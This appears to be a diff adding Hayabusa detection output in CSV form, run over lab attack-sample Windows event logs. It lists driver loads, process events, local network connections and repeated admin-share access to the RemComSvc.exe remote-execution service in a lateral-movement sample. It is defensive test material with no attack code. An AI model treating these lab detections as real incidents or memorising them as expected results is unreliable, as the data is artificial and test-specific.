+2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\vga.dll | Status: Valid | Hash: SHA1=00F4056FD5FE28EC255B4521EE18C700BCF9CEEB,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\vga.dll | Signature: Microsoft Windows,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\TSTheme.exe -Embedding | Process: C:\Windows\System32\TSTheme.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x26656 | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:06.200 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:06.200 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:06.410 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:06.971 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\TSTheme.exe | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:5355 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (PC01.example.corp) | Dst: 10.0.2.18:137 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49184 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:25.488 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:25.488 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: PC01\IEUser | Parent Cmd: winlogon.exe | LID: 0x26656 | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:26.529 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:26.529 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:26.539 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:26.539 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\AtBroker.exe | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:63309 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:62259 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49185 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:59302 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:61049 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49186 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:52122 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:55679 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:64257 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49187 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:02.311 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49188 (PC01.example.corp) | Dst: 10.0.2.18:5357 (PC02) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:02.561 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 127.0.0.1:3702 (PC01.example.corp) | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:03.062 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49189 (PC01.example.corp) | Dst: 127.0.0.1:5357 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:03.062 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:5357 (PC01.example.corp) | Dst: 127.0.0.1:49189 (PC01.example.corp) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3820 | PGUID: 365ABB72-E0AE-5C67-0000-0010C9B81700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x311293,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x311293,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
